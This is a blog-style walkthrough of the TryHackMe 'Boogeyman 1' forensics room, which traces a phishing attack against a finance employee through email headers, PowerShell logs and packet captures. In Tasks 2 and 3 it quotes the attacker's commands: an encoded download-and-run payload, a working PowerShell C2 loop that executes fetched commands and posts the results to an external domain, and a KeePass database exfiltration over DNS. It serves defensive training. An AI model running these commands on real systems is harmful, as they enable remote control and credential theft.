TryHackMe Boogeyman 1 Write-Up!

Hi everyone, this is quite literally my first write-up for a THM machine. Since it is a new room and there are no write-ups yet provided, I decided to write one myself.

So, here is the information about the room in question:

Ok so here is the information about the room in questionRoom Name: Boogeyman1
Offical Introduction: In this room, you will be tasked to analyse the Tactics, Techniques, and Procedures (TTPs) executed by a threat group, from obtaining initial access until achieving its objective.?
Difficulty: Medium
Date: 14.04.2023
Created By: ar33zy
        

Room Link: https://tryhackme.com/room/boogeyman1

Introduction

First things first, join the room and read the "Prerequisites" section. If you have not completed the mentioned rooms, I highly recommend completing the following rooms and obtaining their badges, as they will be very helpful for the investigation at hand:

• Phishing Analysis Fundamentals (this will help you a lot during?email analysis?related tasks)
• Phishing Analysis Tools (this will help you a lot in understanding who the attacker is and determining the C2 domains later on)
• Windows Event Logs (not only for this room, but if you intend to pursue a SOC career, this knowledge will be essential)
• Wireshark:?Traffic Analysis?(this room will expect you to have at least basic knowledge about how the internet works, what protocols are, and how to listen and sniff them in order to gather more information from them)

Environment

You will be working on an Ubuntu machine that can be connected over VNC. Deploy the machine as instructed in the room and click the blue "Show Split View" option on the top right of the page. After that, you're good to go.

Tools

You'll be expected to use the following tools, but everyone is different when it comes to problem-solving, so you may wish to use different tools than the ones listed here:

• LNKParse (a tool that comes with your environment machine that helps you to parse .lnk files for forensics)
• jq (a command-line tool that helps you to prettify and analyze large .json files from the command line)
• Wireshark (a?network packet analyzer?tool that has been used and loved by many professionals in the sector)
• TShark?(a relatively new command-line interface for Wireshark developed by the same team; similar to tcpdump but more capable)
• Thunderbird?(a?mail client?developed by?Mozilla?and maintained mostly by the community as an open-source project for years)

Additional

• PhishTool (an open-source tool that helps you a lot in analyzing emails; I personally used it to perform my analysis here)

Let the Hunt Begins!

Task 2 {[Email Analysis] Look at that headers!}

So according to our scenario:

"Julianne, a?finance employee?working for Quick Logistics LLC, received a follow-up email regarding an?unpaid invoice?from their business partner, B Packaging Inc. Unbeknownst to her, the attached document was malicious and compromised her workstation. The security team was able to flag the suspicious execution of the attachment, in addition to the?phishing reports?received from the other?finance department?employees, making it seem like a targeted attack on the finance team. Upon checking the latest trends, the?initial TTPused for the?malicious attachment?is attributed to the new threat group named?Boogeyman, known for targeting the logistics sector.

You are tasked to analyze and assess the impact of the compromise."

What we have here are the artifacts, and this section is all about the?email file?in hand, so let's prepare it.

First, use the "cat" command to print out the contents and headers of the "dump.eml" file.

I copied it to my computer with the "clipboard" over the slider on the left and created the .eml file on my computer. Then uploaded it to a phish tool. You can find the tool at this link:?https://www.phishtool.com/.

So, the phish tool already shows some security errors there, but those are not our concerns since we need to focus on the first task at hand.

What is the?email address?used to send the phishing email?

You'll see that it's from "[email protected]" immediately.

What is the email address of the victim?

Our victim here is "[email protected]."

What is the name of the third-party mail relay service used by the attacker based on the DKIM-Signature and List-Unsubscribe headers?

To find the answer, you need to go to the phish tool and show the email as a "source." This will literally show you the contents of the email again. The trick here is that you can now "search" among the file more flexibly. So, let's take a look at the DKIM-Signature and the List-Unsubscribe headers.

You'll see the Elasticem signature clear on the List-Unsubscribe header. This probably belongs to the relay service provided by Elastic. It's even more clear in the?DKIM signatures.

Our answer here is clear: "elasticemail."

What is the name of the file inside the?encrypted attachment?

Go to the "Attachments" section on the?PhishTool, and you'll immediately see the "Invoice_20230103.lnk" attachment.

What is the password of the encrypted attachment?

The answer is in the email, so it's pretty straightforward: "Invoice2023!"

Based on the result of the lnkparse tool, what is the?encoded payload?found in the Command Line Arguments field?

You will need the lnkparse tool for this one. Open the file on your environment and download the attachment. You know the password from the previous task.

Use the lnkparse tool to reveal the information inside of the .lnk file.

So, our answer is: "aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AZgBpAGwAZQBzAC4AYgBwAGEAawBjAGEAZwBpAG4AZwAuAHgAeQB6AC8AdQBwAGQAYQB0AGUAJwApAA=="

And this concludes Task 2. Take note of what you've learned here and move on to the next task.

Tip here:

The decoder argument here is "-enc," and correct me if I'm wrong, but without any argument, it will recognize the encoded part as base64. So, you can also go to the CyberChef and decode this command as well, i.e., ".(.n.e.w.-.o.b.j.e.c.t. .n.e.t...w.e.b.c.l.i.e.n.t.)...d.o.w.n.l.o.a.d.s.t.r.i.n.g.(.'.h.t.t.p.:././.f.i.l.e.s...b.p.a.k.c.a.g.i.n.g...x.y.z./.u.p.d.a.t.e.'.).""

Task 3 {[Endpoint Security] Are you sure that’s an invoice?}

So we found that there is a?malicious attachment?that downloads a?PowerShell script?from a specific domain. Based on that information, we can take a look at the PowerShell logs at hand. The?log file?is a really long (I mean long) JSON file. Luckily, we have a handy tool called 'jq.' We can simply format the file at hand to make it more readable.

Determining what is useful here is important. Take a look at the questions. We need to summarize what commands have been executed in PowerShell.

So we can begin to see what happened here. I took the following commands as notes:

-> iex(new-object net.webclient).downloadstring('https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1');pwd"

-> $s='cdn.bpakcaging.xyz:8080';$i='8cce49b0-b86459bb-27fe2489';$p='https://';$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/8cce49b0 -Headers @{\"X-38d2-8f49\"=$i};while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/b86459bb -Headers @{\"X-38d2-8f49\"=$i}).Content;if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/27fe2489 -Method POST -Headers @{\"X-38d2-8f49\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}\n

-> iwr https://files.bpakcaging.xyz/sb.exe -outfile sb.exe;pwd

-> "$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = \"167.71.211.113\"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd"

So two things are clear here. There are two programs have been invoked that called "sb.exe" and "sq3.exe". We can assume why but for now let's go for the questions.

What are the domains used by the attacker for file hosting and C2? Provide the domains in alphabetical order. (e.g. a.domain.com,b.domain.com)

Based on the commands that have been used here, you've already answered the question regarding 'files.bpakcaging.xyz' and 'cdn.bpakcaging.xyz.' Please write them in the answer bar with the described format. Also, please take note that there is a port being used here. Port 8080 will be important for further analysis.

What is the name of the enumeration tool downloaded by the attacker?

We've seen a tool that has been downloaded before right? " iex(new-object net.webclient).downloadstring('https://github.com/S3cur3Th1sSh1t/PowerSharpPack/blob/master/PowerSharpBinaries/Invoke-Seatbelt.ps1');pwd"". So if you check what is this tool you gonna see that it is a handy enumeration tool for security checks on a host.

https://github.com/GhostPack/Seatbelt

Our answer here is "Seatbelt"

What is the file accessed by the attacker using the downloaded?sq3.exe?binary? Provide the full file path with escaped backslashes.

We will need to make some traceback here. You see, sq3.exe has been used to access a file that we don't know on what purpose yet. But it wasn't accessed directly rather than it has been accessed partially by multiple commands.

Luckly we have a handy tool that is pre-installed with almost every program in the world. It's called "search" :). A really advanced tool that we all forget that it existed.

To my amazement attacker made a mistake here and it will be clear on further tasks. The sq3.exe didn't executed in the first attempt so attacker needed to execute it with the direct path.

So you can trace back the cd commands or simply figure it out by knowing that where the AppData folder is located by default.

Also, we've seen the accessed file with it's full path as an argument for the sq3.exe.

-> .\\Music\\sq3.exe AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite \"SELECT * from NOTE limit 100\"

Our answer here is;

"C:\\Users\\j.westcott\\AppData\\Local\\Packages\\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\\LocalState\\plum.sqlite"

Please also take a note that there is a file that has been accessed named "plum.sqlite" it will be important later on.

What is the software that uses the file in Q3?

Take a look at the command and the software name is right there "Microsoft Sticky Notes"

What is the name of the exfiltrated file?

We need to take a look at the powershelll logs again. Just right after that we gonna see a command that called ""$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = \"167.71.211.113\"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd""

and we also took a note for that command before. So we know that a file called "protected_data.kdbx" has been exfiltrated from the client. Now there are two potentially sensetive files that has been acessed here.

What type of file uses the .kdbx file extension?

.kdbx is the default extension of the "KeePass" database file.

What is the encoding used during the exfiltration attempt of the sensitive file?

Take a look at the commands again. You'll stumble to a variable name called "$hex".

What is '$hex'? A variable must be assigned first, and you'll see that it has been assigned to a function.

I presume that it creates?hexadecimal values?from the bytes of the file content. We can see that the '$bytes' variable here contains the bytes of the designated file.

And it send the values over the nslookup to attackers domain over "nslookup" pretty interesting indeed.

So it basicly tells to nslookup that;

Hey, search for this domain: hex line + .bpakcaging.xyz

Our answer here is "hex"

And we also learned the answer of the next question right there.

What is the tool used for exfiltration?

We already learned that is "nslookup".

Task 4 {[Network Traffic Analysis] They got us. Call the bank immediately!}

So far, we know what data was accessed and exfiltrated from the system, as well as the overall impact of the attack. Now it's time to figure out if the attack was indeed successful.

What software is used by the attacker to host its presumed file/payload server?

So what do we learned so far besides of what happened?

• We learned one of the IP addresses was 167.71.211.113
• We learned the domains that been used by the attacker as C2 and possible file server.
• We used what tools have been used in the process.
• We know that port 8080 has been used for file transfer.

For this task we can start with the IP address but there are another ways to do that also. I refer to this command for the IP address in question;

"$file='C:\\Users\\j.westcott\\Documents\\protected_data.kdbx'; $destination = \"\"; $bytes = [System.IO.File]::ReadAllBytes($file);;pwd"

If you use the ip.addr == 167.71.211.113 filter and start analyse the traffic you'll probably immediately see that it is almost in every header.

Python?is a?programming language?that is so versatile, it provides a simple HTTP server that can be used for many things, including our answer.

"python"

What?HTTP?method is used by the C2 for the output of the commands executed by the attacker?

Okay, so we know that the attacker is inside the system. If we put logic here, we can conclude that they need to send information somehow to the C2. We also know that if you want to make a request for sending some data to a server, you need to use a?POST request(you can use other methods as well, depending on what kind of?API you're working with, but that's not the topic here). But let's not jump to conclusions and take a look at the .pcapng file again.

To support my theory, I listed the entire?HTTP traffic?from?Wiresharkand searched them flow by flow. My conclusion was a bit confusing at that point, but only GET and?POST methods?were effectively used during the traffic.

Also, if you closely inspect the requests and responses, you can see a little pattern there.

First we have a new IP on the scene "159.89.205.40" so note it.

Second the victim sends a GET request to the IP and the host responds with the command.

But results of the commands sent by POST requests.

I think that is enough for our answer. "POST".

What is the protocol used during the exfiltration activity?

We know what nslookup is for, the answer "DNS".

What is the password of the exfiltrated file?

For those two questions I have to give a credit to Djalil Ayed for preparing a great walktrough video for the machine since I stucked at this question way too long than it should be. You can find his work at the link below.

https://www.youtube.com/watch?v=fTNbuwjW5IQ

As the rules dictated by?THM, I can't show the answers to the last two questions, but I can tell you what I did to get them.

So, if you click on the hint, you'll notice that the answer is in the output of the execution of sq3.exe, right? At this point, we know that?GET requests?are commands, and?POST requests?are outputs of the commands. So, we can assume that if we see the sq.exe with the correct parameters in the?GET request, we will also get the right output for the command.

The command we need to hunt down is here:

.\Music\sq3.exe AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite "SELECT * from NOTE limit 100"

Or something at least similar to it.

Wireshark?has a cool feature that lets you search for strings and other values inside the packets. So, we will do that and search for the sq3.exe.

After a quick look, we will find the exact GET request and its response.

Now let's find the POST request that corresponds it.

What you'll see is not a clear text output. Instead, you'll get encoded data. What you can do, however, is use a handy tool like?CyberChef?to decode it.

The value is not in hexadecimal, rather it is just decimal, so use the decimal -> string recipe.

If you figure it out what it in the red area, that will be your answer :).

What is the credit card number stored inside the exfiltrated file?

That is a tough one. What we know here is that the attacker sent the .kdbx file with?DNS?requests. They simply created?multiple requests?for each line with the?URL structure?below:

"hex line + .bpakcaging. + .xyz"

These hex lines are actually bytes encoded as?hexadecimal values, so the file has been sent as:

"hex line1 + .bpakcaging. + .xyz"

"hex line2 + .bpakcaging. + .xyz"

"hex line3 + .bpakcaging. + .xyz"

...

We also know that they are all DNS requests. So we need all?DNS requests?that have been sent to "bpakcaging. + .xyz".

This is where t-shark comes in. Djalil Ayed crafted a?command pipelinein his video, and I'll explain here what part works for what result.

tshark -r capture.pcapng -Y "dns.qry.name matches ".bpakcaging.xyz$" && ip.dst == 167.71.211.113" -T fields -e dns.qry.name | grep -v eu-west | sed 's/.bpakcaging.xyz//g' > protected.bin

--> tshark -r capture.pcapng -Y "dns.qry.name matches ".bpakcaging.xyz$" && ip.dst == 167.71.211.113" -T fields -e dns.qry.name

We set the "dns.qry.name matches" filter to get a?regex match?for .bpakcaging.xyz$ and also the destination IP is "167.71.211.113". This search will be performed on the dns.qry.name filter.

--> grep -v eu-west

T-shark shows the entire summary of the package, and we don't need the device information. So we used the -v parameter on grep to ignore it.

--> sed 's/.bpakcaging.xyz//g'

We also don't need anything but the hex lines from the requested?domain names, so we ignore them as well.

--> > protected.bin

This will create a?binary file?as the output of the command.

At that point, we need to turn our binary file into the .kdbx file. Djalil Ayed shared a?Python script?for that, so I'm leaving it here as well:

import binascii

input_filename = "protected.bin"

output_filename = "protected_data.kdbx"

with open(input_filename, "r") as input_file, open(output_filename, "wb") as output_file:

for line in input_file:

line = line.strip()

binary_data = binascii.unhexlify(line)

output_file.write(binary_data)

Use the script with your output file as an attribute. The file will be created afterward.

We learned the password of the file, so we can open it. After a little investigation of the file, you'll see an?account number?that concludes this entire room.

Conclusion

I personally found the room challenging. For myself I found a lot of rabbit holes during the investigation and never hesitate to jump into them. Eventually a simple fact needed to be remembered for this room. Always follow the path with what you found and never overcomplicate the problem at hand.

Thanks for ar33zy for creating this room.